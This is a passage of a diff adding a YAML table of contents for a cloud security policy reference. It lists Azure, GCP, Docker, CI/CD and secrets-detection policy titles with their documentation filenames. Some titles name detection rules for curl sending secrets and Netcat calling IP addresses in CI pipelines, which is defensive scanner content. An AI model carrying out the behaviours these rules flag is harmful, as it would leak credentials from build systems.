ensure-that-application-gateway-uses-waf-in-detection-or-prevention-modes.adoc + - name: Azure cache for Redis has public network access enabled + file: ensure-that-azure-cache-for-redis-disables-public-network-access.adoc + - name: Azure cognitive search does not disable public network access + file: ensure-that-azure-cognitive-search-disables-public-network-access.adoc + - name: Azure container container group is not deployed into a virtual network + file: ensure-that-azure-container-container-group-is-deployed-into-virtual-network.adoc + - name: Azure Cosmos DB enables public network access + file: ensure-that-azure-cosmos-db-disables-public-network-access.adoc + - name: Azure Data Factory (V2) configured with overly permissive network access + file: ensure-that-azure-data-factory-public-network-access-is-disabled.adoc + - name: Azure Event Grid domain public network access is enabled + file: ensure-that-azure-event-grid-domain-public-network-access-is-disabled.adoc + - name: Azure file sync enables public network access + file: ensure-that-azure-file-sync-disables-public-network-access.adoc + - name: Azure Front Door does not have the Azure Web application firewall (WAF) enabled + file: ensure-that-azure-front-door-enables-waf.adoc + - name: Azure front door does not use WAF in Detection or Prevention modes + file: ensure-that-azure-front-door-uses-waf-in-detection-or-prevention-modes.adoc + - name: Azure IoT Hub enables public network access + file: ensure-that-azure-iot-hub-disables-public-network-access.adoc + - name: Azure Synapse Workspaces do not enable managed virtual networks + file: ensure-that-azure-synapse-workspaces-enables-managed-virtual-networks.adoc + - name: Azure Synapse workspaces have IP firewall rules attached + file: ensure-that-azure-synapse-workspaces-have-no-ip-firewall-rules-attached.adoc + - name: Azure Function App doesn't redirect HTTP to HTTPS + file: ensure-that-function-apps-is-only-accessible-over-https.adoc + - name: Key vault 
does not allow firewall rules settings + file: ensure-that-key-vault-allows-firewall-rules-settings.adoc + - name: Azure Virtual machine NIC has IP forwarding enabled + file: ensure-that-network-interfaces-disable-ip-forwarding.adoc + - name: Network interfaces use public IPs + file: ensure-that-network-interfaces-dont-use-public-ips.adoc + - name: Not only SSL are enabled for cache for Redis + file: ensure-that-only-ssl-are-enabled-for-cache-for-redis.adoc + - name: PostgreSQL server does not disable public network access + file: ensure-that-postgresql-server-disables-public-network-access.adoc + - name: SQL Server is enabled for public network access + file: ensure-that-sql-server-disables-public-network-access.adoc + - name: Storage Accounts without Secure transfer enabled + file: ensure-that-storage-account-enables-secure-transfer.adoc + - name: Azure storage account does allow public access + file: ensure-that-storage-accounts-disallow-public-access.adoc + - name: Azure Network Security Group having Inbound rule overly permissive to all traffic on UDP protocol + file: ensure-that-udp-services-are-restricted-from-the-internet.adoc + - name: Azure Storage Account default network access is set to 'Allow' + file: set-default-network-access-rule-for-storage-accounts-to-deny.adoc + - name: Azure storage account has a blob container that is publicly accessible + file: set-public-access-level-to-private-for-blob-containers.adoc +- name: Azure Secrets Policies + dir: azure-secrets-policies + topics: + - name: Azure Secrets Policies + file: azure-secrets-policies.adoc + - name: Secrets are exposed in Azure VM customData + file: bc-azr-secrets-2.adoc + - name: Azure Key Vault secrets does not have expiration date + file: set-an-expiration-date-on-all-secrets.adoc +- name: Azure Storage Policies + dir: azure-storage-policies + topics: + - name: Azure Storage Policies + file: azure-storage-policies.adoc + - name: Azure Storage Account using insecure TLS version + file: 
bc-azr-storage-2.adoc + - name: Azure Cosmos DB key based authentication is enabled + file: bc-azr-storage-4.adoc + - name: Storage Account name does not follow naming rules + file: ensure-storage-accounts-adhere-to-the-naming-rules.adoc +- name: Public Policies 1 + dir: public-policies-1 + topics: + - name: Public Policies 1 + file: public-policies-1.adoc + - name: MariaDB servers do not have public network access enabled set to False + file: bc-azr-public-1.adoc +--- +kind: chapter +name: Build Integrity Policies +dir: build-integrity-policies +topics: +- name: Build Integrity Policies + file: build-integrity-policies.adoc +- name: Bitbucket Policies + dir: bitbucket-policies + topics: + - name: Bitbucket Policies + file: bitbucket-policies.adoc + - name: BitBucket pull requests require less than approvals + file: merge-requests-should-require-at-least-2-approvals-1.adoc +- name: Github Actions Policies + dir: github-actions-policies + topics: + - name: GitHub Actions ACTIONS_ALLOW_UNSECURE_COMMANDS environment variable is set to true + file: ensure-actions-allow-unsecure-commands-isnt-true-on-environment-variables.adoc + - name: GitHub Actions Run commands are vulnerable to shell injection + file: ensure-run-commands-are-not-vulnerable-to-shell-injection.adoc + - name: GitHub Actions artifact build do not have SBOM attestation in pipeline + file: found-artifact-build-without-evidence-of-cosign-sbom-attestation-in-pipeline.adoc + - name: Github Actions Policies + file: github-actions-policies.adoc + - name: GitHub Actions artifact build do not have cosign - sign execution in pipeline + file: no-evidence-of-signing.adoc + - name: GitHub Actions curl is being with secrets + file: suspicious-use-of-curl-with-secrets.adoc + - name: GitHub Actions Netcat is being used with IP address + file: suspicious-use-of-netcat-with-ip-address.adoc + - name: GitHub Actions contain workflow_dispatch inputs parameters + file: 
github-actions-contain-workflow-dispatch-inputs-parameters.adoc +- name: Github Policies + dir: github-policies + topics: + - name: Github Policies + file: github-policies.adoc + - name: GitHub repository has less than 2 admins + file: ensure-2-admins-are-set-for-each-repository.adoc + - name: GitHub branch protection rules are not enforced on administrators + file: ensure-branch-protection-rules-are-enforced-on-administrators.adoc + - name: GitHub Actions Environment Secrets are not encrypted + file: ensure-github-actions-secrets-are-encrypted.adoc + - name: GitHub branch protection does not dismiss stale reviews + file: ensure-github-branch-protection-dismisses-stale-review-on-new-commit.adoc + - name: GitHub branch protection does not require code owner reviews + file: ensure-github-branch-protection-requires-codeowner-reviews.adoc + - name: GitHub branch protection does not require status checks + file: ensure-github-branch-protection-requires-conversation-resolution.adoc + - name: GitHub branch protection does not require push restrictions + file: ensure-github-branch-protection-requires-push-restrictions.adoc + - name: GitHub branch protection does not require status checks + file: ensure-github-branch-protection-requires-status-checks.adoc + - name: GitHub branch protection does not restrict who can dismiss a PR + file: ensure-github-branch-protection-restricts-who-can-dismiss-pr-reviews-cis-115.adoc + - name: GitHub branch protection rules allow branch deletions + file: ensure-github-branch-protection-rules-does-not-allow-deletions.adoc + - name: GitHub branch protection rules do not require linear history + file: ensure-github-branch-protection-rules-requires-linear-history.adoc + - name: GitHub merge requests should require at least 2 approvals + file: ensure-github-branch-protection-rules-requires-signed-commits.adoc + - name: GitHub repository webhooks do not use HTTPs + file: ensure-github-organization-and-repository-webhooks-are-using-https.adoc + - 
name: GitHub organization security settings do not have IP allow list enabled
+    file: ensure-github-organization-security-settings-has-ip-allow-list-enabled.adoc
+  - name: GitHub organization security settings do not include 2FA capability
+    file: ensure-github-organization-security-settings-require-2fa.adoc
+  - name: GitHub organization security settings do not include SSO
+    file: ensure-github-organization-security-settings-require-sso.adoc
+  - name: GitHub organization webhooks do not use HTTPs
+    file: ensure-github-organization-webhooks-are-using-https.adoc
+  - name: GitHub Repository doesn't have vulnerability alerts enabled
+    file: ensure-github-repository-has-vulnerability-alerts-enabled.adoc
+  - name: GitHub merge requests should require at least 2 approvals
+    file: merge-requests-should-require-at-least-2-approvals.adoc
+- name: Gitlab CI Policies
+  dir: gitlab-ci-policies
+  topics:
+  - name: Rules used could create a double pipeline
+    file: avoid-creating-rules-that-generate-double-pipelines.adoc
+  - name: Gitlab CI Policies
+    file: gitlab-ci-policies.adoc
+  - name: Suspicious use of curl in a GitLab CI environment
+    file: suspicious-use-of-curl-with-ci-environment-variables-in-script.adoc
+- name: Gitlab Policies
+  dir: gitlab-policies
+  topics:
+  - name: Gitlab organization has groups with no two factor authentication configured
+    file: ensure-all-gitlab-groups-require-two-factor-authentication.adoc
+  - name: Gitlab branch protection rules allows force pushes
+    file: ensure-gitlab-branch-protection-rules-does-not-allow-force-pushes.adoc
+  - name: Gitlab project commits are not signed
+    file: ensure-gitlab-commits-are-signed.adoc
+  - name: Gitlab project does not prevent secrets
+    file: ensure-gitlab-prevent-secrets-is-enabled.adoc
+  - name: Gitlab Policies
+    file: gitlab-policies.adoc
+  - name: Gitlab project merge has less than 2 approvals
+    file: merge-requests-do-not-require-two-or-more-approvals-to-merge.adoc
+---
+kind: chapter
+name: Docker Policies
+dir: docker-policies
+topics:
+- name: Docker Policies
+  file: docker-policies.adoc
+- name: Docker Policy Index
+  dir: docker-policy-index
+  topics:
+  - name: Docker Policy Index
+    file: docker-policy-index.adoc
+  - name: Docker From alias is not unique for multistage builds
+    file: ensure-docker-from-alias-is-unique-for-multistage-builds.adoc
+  - name: Docker APT is used
+    file: ensure-docker-apt-is-not-used.adoc
+  - name: Docker WORKDIR values are not absolute paths
+    file: ensure-docker-workdir-values-are-absolute-paths.adoc
+  - name: Port 22 is exposed
+    file: ensure-port-22-is-not-exposed.adoc
+  - name: A user for the container has not been created
+    file: ensure-that-a-user-for-the-container-has-been-created.adoc
+  - name: Copy is not used instead of Add in Dockerfiles
+    file: ensure-that-copy-is-used-instead-of-add-in-dockerfiles.adoc
+  - name: Healthcheck instructions have not been added to container images
+    file: ensure-that-healthcheck-instructions-have-been-added-to-container-images.adoc
+  - name: LABEL maintainer is used instead of MAINTAINER (deprecated)
+    file: ensure-that-label-maintainer-is-used-instead-of-maintainer-deprecated.adoc
+  - name: Base image uses a latest version tag
+    file: ensure-the-base-image-uses-a-non-latest-version-tag.adoc
+  - name: Last USER is root
+    file: ensure-the-last-user-is-not-root.adoc
+  - name: Update instructions are used alone in a Dockerfile
+    file: ensure-update-instructions-are-not-used-alone-in-the-dockerfile.adoc
+---
+kind: chapter
+name: Secrets Policies
+dir: secrets-policies
+topics:
+- name: Secrets Policies
+  file: secrets-policies.adoc
+- name: Secrets Policy Index
+  dir: secrets-policy-index
+  topics:
+  - name: Secrets Policy Index
+    file: secrets-policy-index.adoc
+  - name: GitHub repository is not Private
+    file: ensure-repository-is-private.adoc
+  - name: Artifactory Credentials
+    file: git-secrets-1.adoc
+  - name: Mailchimp Access Key
+    file: git-secrets-11.adoc
+  - name: NPM Token
+    file: git-secrets-12.adoc
+  - name: Private Key
+    file: git-secrets-13.adoc
+  - name: Slack Token
+    file: git-secrets-14.adoc
+  - name: SoftLayer Credentials
+    file: git-secrets-15.adoc
+  - name: Square OAuth Secret
+    file: git-secrets-16.adoc
+  - name: Stripe Access Key
+    file: git-secrets-17.adoc
+  - name: Twilio Access Key
+    file: git-secrets-18.adoc
+  - name: Hex High Entropy String
+    file: git-secrets-19.adoc
+  - name: AWS Access Keys
+    file: git-secrets-2.adoc
+  - name: Airtable API Key
+    file: git-secrets-21.adoc
+  - name: Algolia Key
+    file: git-secrets-22.adoc
+  - name: Alibaba Cloud Keys
+    file: git-secrets-23.adoc
+  - name: Asana Key
+    file: git-secrets-24.adoc
+  - name: Atlassian Oauth2 Keys
+    file: git-secrets-25.adoc
+  - name: Auth0 Keys
+    file: git-secrets-26.adoc
+  - name: Bitbucket Keys
+    file: git-secrets-27.adoc
+  - name: Buildkite Agent Token
+    file: git-secrets-28.adoc
+  - name: CircleCI Personal Token
+    file: git-secrets-29.adoc
+  - name: Azure Storage Account Access Keys
+    file: git-secrets-3.adoc
+  - name: Codecov API key
+    file: git-secrets-30.adoc
+  - name: Coinbase Keys
+    file: git-secrets-31.adoc
+  - name: Confluent Keys
+    file: git-secrets-32.adoc
+  - name: Databricks Authentication Token
+    file: git-secrets-33.adoc
+  - name: DigitalOcean Token
+    file: git-secrets-34.adoc
+  - name: Discord Token
+    file: git-secrets-35.adoc
+  - name: Doppler API Key
+    file: git-secrets-36.adoc
+  - name: DroneCI Token
+    file: git-secrets-37.adoc
+  - name: Dropbox App Credentials
+    file: git-secrets-38.adoc
+  - name: Dynatrace token
+    file: git-secrets-39.adoc
+  - name: Basic Auth Credentials
+    file: git-secrets-4.adoc
+  - name: Elastic Email Key
+    file: git-secrets-40.adoc
+  - name: Fastly Personal Token
+    file: git-secrets-41.adoc
+  - name: FullStory API Key
+    file: git-secrets-42.adoc
+  - name: GitHub Token
+    file: git-secrets-43.adoc
+  - name: GitLab Token
+    file: git-secrets-44.adoc
+  - name: Google Cloud Keys
+    file: git-secrets-45.adoc
+  - name: Grafana Token
+    file: git-secrets-46.adoc
+  - name: Terraform Cloud API Token
+    file: git-secrets-47.adoc
+  - name: Heroku Platform Key
+    file: git-secrets-48.adoc
+  - name: HubSpot API Key
+    file: git-secrets-49.adoc
+  - name: Cloudant Credentials
+    file: git-secrets-5.adoc
+  - name: Intercom Access Token
+    file: git-secrets-50.adoc
+  - name: Jira Token
+    file: git-secrets-51.adoc
+  - name: LaunchDarkly Personal Token
+    file: git-secrets-52.adoc
+  - name: Netlify Token
+    file: git-secrets-53.adoc
+  - name: New Relic Key
+    file: git-secrets-54.adoc
+  - name: Notion Integration Token
+    file: git-secrets-55.adoc
+  - name: Okta Token
+    file: git-secrets-56.adoc
+  - name: PagerDuty Authorization Token
+    file: git-secrets-57.adoc
+  - name: PlanetScale Token
+    file: git-secrets-58.adoc
+  - name: Postman API Key
+    file: git-secrets-59.adoc
+  - name: Base64 High Entropy Strings
+    file: git-secrets-6.adoc
+  - name: Pulumi Access Token
+    file: git-secrets-60.adoc
+  - name: Python Package Index Key
+    file: git-secrets-61.adoc
+  - name: RapidAPI Key
+    file: git-secrets-62.adoc
+  - name: Readme API Key
+    file: git-secrets-63.adoc
+  - name: RubyGems API Key
+    file: git-secrets-64.adoc
+  - name: Sentry Token
+    file: git-secrets-65.adoc
+  - name: Splunk User Credentials
+    file: git-secrets-66.adoc
+  - name: Sumo Logic Keys
+    file: git-secrets-67.adoc
+  - name: Telegram Bot Token
+    file: git-secrets-68.adoc
+  - name: Travis Personal Token
+    file: git-secrets-69.adoc
+  - name: IBM Cloud IAM Key
+    file: git-secrets-7.adoc
+  - name: Typeform API Token
+    file: git-secrets-70.adoc
+  - name: Vault Unseal Key
+    file: git-secrets-71.adoc
+  - name: Yandex Predictor API key
+    file: git-secrets-72.adoc
+  - name: Cloudflare API Credentials
+    file: git-secrets-73.adoc
+  - name: Vercel API Token
+    file: git-secrets-74.adoc
+  - name: Webflow API Token
+    file: git-secrets-75.adoc
+  - name: Scalr API Token
+    file: git-secrets-76.adoc
+  - name: MongoDB Connection String
+    file: git-secrets-77.adoc
+  - name: IBM COS HMAC Credentials
+    file: git-secrets-8.adoc
+  - name: JSON Web Token
+    file: git-secrets-9.adoc
+---
+kind: chapter
+name: Google Cloud Policies
+dir: google-cloud-policies
+topics:
+- name: Google Cloud Policies
+  file: google-cloud-policies.adoc
+- name: Cloud Sql Policies
+  dir: cloud-sql-policies
+  topics:
+  - name: Cloud Sql Policies
+    file: cloud-sql-policies.adoc
+  - name: GCP MySQL instance with local_infile database flag is not disabled
+    file: bc-gcp-sql-1.adoc
+  - name: GCP SQL Server instance database flag 'contained database authentication' is enabled
+    file: bc-gcp-sql-10.adoc
+  - name: GCP Cloud SQL database instances have public IPs
+    file: bc-gcp-sql-11.adoc
+  - name: GCP PostgreSQL instance with log_checkpoints database flag is disabled
+    file: bc-gcp-sql-2.adoc
+  - name: GCP PostgreSQL instance database flag log_connections is disabled
+    file: bc-gcp-sql-3.adoc
+  - name: GCP PostgreSQL instance database flag log_disconnections is disabled
+    file: bc-gcp-sql-4.adoc
+  - name: GCP PostgreSQL instance database flag log_lock_waits is disabled
+    file: bc-gcp-sql-5.adoc
+  - name: GCP PostgreSQL instance database flag log_min_messages is not set
+    file: bc-gcp-sql-6.adoc
+  - name: GCP PostgreSQL instance database flag log_temp_files is not set to 0
+    file: bc-gcp-sql-7.adoc
+  - name: GCP PostgreSQL instance database flag log_min_duration_statement is not set to -1
+    file: bc-gcp-sql-8.adoc
+  - name: GCP SQL Server instance database flag 'cross db ownership chaining' is enabled
+    file: bc-gcp-sql-9.adoc
+- name: Google Cloud General Policies
+  dir: google-cloud-general-policies
+  topics:
+  - name: Google Cloud General Policies
+    file: google-cloud-general-policies.adoc
+  - name: GCP SQL Instances do not have SSL configured for incoming connections
+    file: bc-gcp-general-1.adoc
+  - name: GCP SQL database instance does not have backup configuration enabled
+    file: bc-gcp-general-2.adoc
+  - name: GCP BigQuery dataset is publicly accessible
+    file: bc-gcp-general-3.adoc
+  - name: GCP KMS Symmetric key not rotating in every 90 days
+    file: bc-gcp-general-4.adoc
+  - name: GCP VM disks not encrypted with Customer-Supplied Encryption Keys (CSEK)
+    file: bc-gcp-general-x.adoc
+  - name: GCP VM instance with Shielded VM features disabled
+    file: bc-gcp-general-y.adoc
+  - name: Boot disks for instances do not use CSEKs
+    file: encrypt-boot-disks-for-instances-with-cseks.adoc
+  - name: GCP Artifact Registry repositories are not encrypted with Customer Supplied Encryption Keys (CSEK)
+    file: ensure-gcp-artifact-registry-repositories-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc
+  - name: GCP Big Query Datasets are not encrypted with Customer Supplied Encryption Keys (CSEK)
+    file: ensure-gcp-big-query-tables-are-encrypted-with-customer-supplied-encryption-keys-csek-1.adoc
+  - name: GCP Big Query Tables are not encrypted with Customer Supplied Encryption Keys (CSEK)
+    file: ensure-gcp-big-query-tables-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc
+  - name: GCP Big Table Instances are not encrypted with Customer Supplied Encryption Keys (CSEKs)
+    file: ensure-gcp-big-table-instances-are-encrypted-with-customer-supplied-encryption-keys-cseks.adoc
+  - name: GCP cloud build workers are not private
+    file: ensure-gcp-cloud-build-workers-are-private.adoc
+  - name: GCP Cloud storage does not have versioning enabled
+    file: ensure-gcp-cloud-storage-has-versioning-enabled.adoc
+  - name: GCP data flow jobs are not encrypted with Customer Supplied Encryption Keys (CSEK)
+    file: ensure-gcp-data-flow-jobs-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc
+  - name: GCP data fusion instances are not private
+    file: ensure-gcp-data-fusion-instances-are-private.adoc
+  - name: GCP DataFusion does not have stack driver logging enabled
+    file: ensure-gcp-datafusion-has-stack-driver-logging-enabled.adoc
+  - name: GCP DataFusion does not have stack driver monitoring enabled
+    file: ensure-gcp-datafusion-has-stack-driver-monitoring-enabled.adoc
+  - name: GCP Dataproc cluster is not encrypted with Customer Supplied Encryption Keys (CSEKs)
+    file: ensure-gcp-dataproc-cluster-is-encrypted-with-customer-supplied-encryption-keys-cseks.adoc
+  - name: GCP KMS keys are not protected from deletion
+    file: ensure-gcp-kms-keys-are-protected-from-deletion.adoc
+  - name: GCP Memorystore for Redis has AUTH disabled
+    file: ensure-gcp-memorystore-for-redis-is-auth-enabled.adoc
+  - name: GCP Memorystore for Redis does not use intransit encryption
+    file: ensure-gcp-memorystore-for-redis-uses-intransit-encryption.adoc
+  - name: GCP Pub/Sub Topics are not encrypted with Customer Supplied Encryption Keys (CSEK)
+    file: ensure-gcp-pubsub-topics-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc
+  - name: GCP resources that support labels do not have labels
+    file: ensure-gcp-resources-that-suppot-labels-have-labels.adoc
+  - name: GCP Spanner Database is not encrypted with Customer Supplied Encryption Keys (CSEKs)
+    file: ensure-gcp-spanner-database-is-encrypted-with-customer-supplied-encryption-keys-cseks.adoc
+  - name: GCP SQL database does not use the latest Major version
+    file: ensure-gcp-sql-database-uses-the-latest-major-version.adoc
+  - name: GCP subnet does not have a private IP Google access
+    file: ensure-gcp-subnet-has-a-private-ip-google-access.adoc
+  - name: GCP Vertex AI datasets do not use a Customer Manager Key (CMK)
+    file: ensure-gcp-vertex-ai-datasets-use-a-customer-manager-key-cmk.adoc
+  - name: GCP Vertex AI Metadata Store does not use a Customer Manager Key (CMK)
+    file: ensure-gcp-vertex-ai-metadata-store-uses-a-customer-manager-key-cmk.adoc
+  - name: GCP KMS crypto key is anonymously accessible
+    file: ensure-that-cloud-kms-cryptokeys-are-not-anonymously-or-publicly-accessible.adoc
+  - name: There are not only GCP-managed service account keys for each service account
+    file: ensure-that-there-are-only-gcp-managed-service-account-keys-for-each-service-account.adoc
+- name: Google Cloud IAM Policies
+  dir: google-cloud-iam-policies
+  topics:
+  - name: Google Cloud IAM Policies
+    file: google-cloud-iam-policies.adoc
+  - name: GCP VM instance configured with default service account
+    file: bc-gcp-iam-1.adoc
+  - name: GCP IAM primitive roles are in use
+    file: bc-gcp-iam-10.adoc
+  - name: GCP VM instance using a default service account with full access to all Cloud APIs
+    file: bc-gcp-iam-2.adoc
+  - name: GCP IAM user are assigned Service Account User or Service Account Token creator roles at project level
+    file: bc-gcp-iam-3.adoc
+  - name: GCP IAM Service account does have admin privileges
+    file: bc-gcp-iam-4.adoc
+  - name: Roles impersonate or manage Service Accounts used at folder level
+    file: bc-gcp-iam-5.adoc
+  - name: Roles impersonate or manage Service Accounts used at organizational level
+    file: bc-gcp-iam-6.adoc
+  - name: Default Service Account is used at project level
+    file: bc-gcp-iam-7.adoc
+  - name: Default Service Account is used at organization level
+    file: bc-gcp-iam-8.adoc
+  - name: Default Service Account is used at folder level
+    file: bc-gcp-iam-9.adoc
+  - name: GCP Cloud KMS Key Rings are anonymously or publicly accessible
+    file: ensure-gcp-cloud-kms-key-rings-is-not-publicly-accessible-1.adoc
+  - name: A MySQL database instance allows anyone to connect with administrative privileges
+    file: ensure-that-a-mysql-database-instance-does-not-allow-anyone-to-connect-with-administrative-privileges.adoc
+- name: Google Cloud Kubernetes Policies
+  dir: google-cloud-kubernetes-policies
+  topics:
+  - name: Google Cloud Kubernetes Policies
+    file: google-cloud-kubernetes-policies.adoc
+  - name: GCP Kubernetes Engine Clusters have Stackdriver Logging disabled
+    file: bc-gcp-kubernetes-1.adoc
+  - name: GKE control plane is public
+    file: bc-gcp-kubernetes-10.adoc
+  - name: GCP Kubernetes Engine Clusters Basic Authentication is set to Enabled
+    file: bc-gcp-kubernetes-11.adoc
+  - name: GCP Kubernetes Engine Clusters have Master authorized networks disabled
+    file: bc-gcp-kubernetes-12.adoc
+  - name: GCP Kubernetes Engine Clusters without any label information
+    file: bc-gcp-kubernetes-13.adoc
+  - name: GCP Kubernetes Engine Clusters not using Container-Optimized OS for Node image
+    file: bc-gcp-kubernetes-14.adoc
+  - name: GCP Kubernetes Engine Clusters have Alias IP disabled
+    file: bc-gcp-kubernetes-15.adoc
+  - name: GCP Kubernetes Engine Clusters have Legacy Authorization enabled
+    file: bc-gcp-kubernetes-2.adoc
+  - name: GCP Kubernetes Engine Clusters have Cloud Monitoring disabled
+    file: bc-gcp-kubernetes-3.adoc
+  - name: GCP Kubernetes cluster node auto-repair configuration disabled
+    file: bc-gcp-kubernetes-4.adoc
+  - name: GCP Kubernetes cluster node auto-upgrade configuration disabled
+    file: bc-gcp-kubernetes-5.adoc
+  - name: GCP Kubernetes Engine private cluster has private endpoint disabled
+    file: bc-gcp-kubernetes-6.adoc
+  - name: GCP Kubernetes Engine Clusters have Network policy disabled
+    file: bc-gcp-kubernetes-7.adoc
+  - name: GCP Kubernetes engine clusters have client certificate disabled
+    file: bc-gcp-kubernetes-8.adoc
+  - name: GCP Kubernetes Engine Clusters have pod security policy disabled
+    file: bc-gcp-kubernetes-9.adoc
+  - name: GCP Kubernetes cluster intra-node visibility disabled
+    file: enable-vpc-flow-logs-and-intranode-visibility.adoc
+  - name: GCP Kubernetes Engine Clusters not configured with private nodes feature
+    file: ensure-clusters-are-created-with-private-nodes.adoc
+  - name: GCP Kubernetes Engine Cluster Nodes have default Service account for Project access
+    file: ensure-gke-clusters-are-not-running-using-the-compute-engine-default-service-account.adoc
+  - name: GCP Kubernetes cluster shielded GKE node with integrity monitoring disabled
+    file: ensure-integrity-monitoring-for-shielded-gke-nodes-is-enabled.adoc
+  - name: GCP Kubernetes Engine Clusters have legacy compute engine metadata endpoints enabled
+    file: ensure-legacy-compute-engine-instance-metadata-apis-are-disabled.adoc
+  - name: GCP Kubernetes cluster shielded GKE node with Secure Boot disabled
+    file: ensure-secure-boot-for-shielded-gke-nodes-is-enabled.adoc
+  - name: GCP Kubernetes cluster Shielded GKE Nodes feature disabled
+    file: ensure-shielded-gke-nodes-are-enabled.adoc
+  - name: The GKE metadata server is disabled
+    file: ensure-the-gke-metadata-server-is-enabled.adoc
+  - name: GCP Kubernetes Engine cluster not using Release Channel for version management
+    file: ensure-the-gke-release-channel-is-set.adoc
+  - name: GCP Kubernetes Engine Clusters have binary authorization disabled
+    file: ensure-use-of-binary-authorization.adoc
+  - name: Kubernetes RBAC users are not managed with Google Groups for GKE
+    file: manage-kubernetes-rbac-users-with-google-groups-for-gke.adoc
+- name: Google Cloud Networking Policies
+  dir: google-cloud-networking-policies
+  topics:
+  - name: Google Cloud Networking Policies
+    file: google-cloud-networking-policies.adoc
+  - name: GCP Firewall rule allows all traffic on SSH port (22)
+    file: bc-gcp-networking-1.adoc
+  - name: GCP Projects have OS Login disabled
+    file: bc-gcp-networking-10.adoc
+  - name: GCP VM instances have serial port access enabled
+    file: bc-gcp-networking-11.adoc
+  - name: GCP VM instances have IP Forwarding enabled
+    file: bc-gcp-networking-12.adoc
+  - name: GCP Firewall rule allows all traffic on RDP port (3389)
+    file: bc-gcp-networking-2.adoc
+  - name: GCP HTTPS Load balancer is set with SSL policy having TLS version 1.1 or lower
+    file: bc-gcp-networking-3.adoc
+  - name: GCP SQL database is publicly accessible
+    file: bc-gcp-networking-4.adoc
+  - name: GCP Cloud DNS has DNSSEC disabled
+    file: bc-gcp-networking-5.adoc
+  - name: RSASHA1 is used for Zone-Signing and Key-Signing Keys in Cloud DNS DNSSEC
+    file: bc-gcp-networking-6.adoc
+  - name: GCP Kubernetes Engine Clusters using the default network
+    file: bc-gcp-networking-7.adoc
+  - name: GCP VM instances do have block project-wide SSH keys feature disabled
+    file: bc-gcp-networking-8.adoc
+  - name: GCP Projects do have OS Login disabled
+    file: bc-gcp-networking-9.adoc
+  - name: GCP Cloud Armor policy not configured with cve-canary rule
+    file: ensure-cloud-armor-prevents-message-lookup-in-log4j2.adoc
+  - name: GCP Cloud Function HTTP trigger is not secured
+    file: ensure-gcp-cloud-function-http-trigger-is-secured.adoc
+  - name: GCP Firewall rule allows all traffic on MySQL DB port (3306)
+    file: ensure-gcp-compute-firewall-ingress-does-not-allow-unrestricted-mysql-access.adoc
+  - name: GCP Firewall rule allows all traffic on MySQL DB port (3306)
+    file: ensure-gcp-firewall-rule-does-not-allows-all-traffic-on-mysql-port-3306.adoc
+  - name: GCP GCR Container Vulnerability Scanning is disabled
+    file: ensure-gcp-gcr-container-vulnerability-scanning-is-enabled.adoc
+  - name: GCP Google compute firewall ingress allow FTP port (20) access
+    file: ensure-gcp-google-compute-firewall-ingress-does-not-allow-ftp-port-20-access.adoc
+  - name: GCP Firewall with Inbound rule overly permissive to All Traffic
+    file: ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-access-to-all-ports.adoc
+  - name: GCP Firewall rule allows all traffic on FTP port (21)
+    file: ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-ftp-access.adoc
+  - name: GCP Firewall rule allows all traffic on HTTP port (80)
+    file: ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-http-port-80-access.adoc
+  - name: GCP VPC Network subnets have Private Google access disabled
+    file: ensure-gcp-private-google-access-is-enabled-for-ipv6.adoc
+  - name: GCP project is configured with legacy network
+    file: ensure-legacy-networks-do-not-exist-for-a-project.adoc
+- name: Google Cloud Public Policies
+  dir: google-cloud-public-policies
+  topics:
+  - name: Google Cloud Public Policies
+    file: google-cloud-public-policies.adoc
+  - name: GCP Storage buckets has public access to all authenticated users
+    file: bc-gcp-public-1.adoc
+  - name: GCP VM instance with the external IP address
+    file: bc-gcp-public-2.adoc
+  - name: GCP Cloud Run services are anonymously or publicly accessible
+    file: ensure-cloud-run-service-is-not-anonymously-or-publicly-accessible.adoc
+  - name: GCP Artifact Registry repositories are anonymously or publicly accessible
+    file: ensure-gcp-artifact-registry-repository-is-not-anonymously-or-publicly-accessible.adoc
+  - name: GCP BigQuery Tables are anonymously or publicly accessible
+    file: ensure-gcp-bigquery-table-is-not-publicly-accessible.adoc
+  - name: GCP Dataflow jobs are not private
+    file: ensure-gcp-cloud-dataflow-job-has-public-ips.adoc
+  - name: GCP KMS crypto key is anonymously accessible
+    file: ensure-gcp-cloud-kms-cryptokey-is-not-anonymously-or-publicly-accessible.adoc
+  - name: GCP Dataproc Clusters have public IPs
+    file: ensure-gcp-dataproc-cluster-does-not-have-a-public-ip.adoc
+  - name: GCP Dataproc clusters are anonymously or publicly accessible
+    file: ensure-gcp-dataproc-cluster-is-not-anonymously-or-publicly-accessible.adoc
+  - name: GCP Pub/Sub Topics are anonymously or publicly accessible
+    file: ensure-gcp-pubsub-topic-is-not-anonymously-or-publicly-accessible.adoc
+  - name: GCP Vertex AI instances are not private
+    file: ensure-gcp-vertex-ai-workbench-does-not-have-public-ips.adoc
+  - name: GCP Container Registry repositories are anonymously or publicly accessible
+    file: ensure-google-container-registry-repository-is-not-anonymously-or-publicly-accessible.adoc
+- name: Google Cloud Storage Gcs Policies
+  dir: google-cloud-storage-gcs-policies
+  topics:
+  - name: Google Cloud Storage Gcs Policies
+    file: google-cloud-storage-gcs-policies.adoc
+  - name: GCP cloud storage bucket with uniform bucket-level access disabled
+    file: bc-gcp-gcs-2.adoc
+  - name: GCP Storage Bucket does not have Access and Storage Logging enabled
+    file: bc-gcp-logging-2.adoc
+  - name: GCP storage bucket is logging to itself
+    file: bc-gcp-logging-3.adoc
+- name: Logging Policies 1
+  dir: logging-policies-1
+  topics:
+  - name: Logging Policies 1
+    file: logging-policies-1.adoc
+  - name: GCP VPC Flow logs for the subnet is set to Off
+    file: bc-gcp-logging-1.adoc
+  - name: GCP Project audit logging is not configured properly across all services and all users in a project
+    file: ensure-that-cloud-audit-logging-is-configured-properly-across-all-services-and-all-users-from-a-project.adoc
+  - name: GCP Log bucket retention policy is not configured using bucket lock
+    file: ensure-that-retention-policies-on-log-buckets-are-configured-using-bucket-lock.adoc
+---
+kind: chapter
+name: Kubernetes Policies
+dir: kubernetes-policies
+topics:
+- name: Kubernetes Policies
+  file: kubernetes-policies.adoc
+- name: Kubernetes Policy Index
+  dir: kubernetes-policy-index
+  topics:
+  - name: Kubernetes Policy Index
